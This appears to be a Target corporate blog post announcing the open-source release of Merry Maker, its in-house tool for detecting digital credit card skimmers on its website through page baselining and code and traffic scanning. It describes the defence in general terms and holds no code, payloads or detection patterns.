Credit card skimmers are custom-made additions to payment devices (like ATMs or gas pumps) that criminals build and use to steal a consumer’s payment information. The threat also exists in digital form, as malicious code covertly inserted into websites to steal credit card information. And with many more people shopping online, protecting against digital skimmers is more important than ever.
A Proactive Defense
Several years ago, we built our own system and technology when we realized there were no readily available solutions in the market to defend against digital skimming. The first step, which would be the most immediate way to lower risk, was to remove significant amounts of third-party code from Target.com. This was also quite a disruptive approach given holiday season was right around the corner and we were entering peak operations time. We were very thoughtful as we removed the code to ensure the website remained stable and to maintain a frictionless guest experience throughout the process.
Once completed, we then pivoted to identifying a way to detect the presence of digital skimmers on Target.com. We focused on a few key processes:
- Preserving a baseline of our existing payment pages by saving the code being served by Target.com along with the network traffic generated by test payment transactions
- Scanning the saved code for any malicious indicators
- Scanning the saved network traffic for any potential compromise
An Open Defense
Since its launch in 2018, Merry Maker has completed over one million website scans, and we’ve filed multiple patent applications. And why the name Merry Maker? The technology was launched right before Thanksgiving in 2018 and we nicknamed it for its ability to help keep the holiday shopping season – and all shopping occasions – safer and merrier.
Today we’ve open sourced the Merry Maker framework along with several detection rules in the hopes that this information helps other cybersecurity teams stand up their own customized defense. Digital security is a team sport – a threat to one is a threat to all – and entities need to work together to create safe online environments for consumers. We’re proud to be a leading sharer and collaborator across the retail industry and we hope Merry Maker helps others protect against digital skimming attacks.Click here to access the Merry Maker open source project.
Click here to read a technical behind-the-scenes of how Merry Maker works in real-time and how we built it.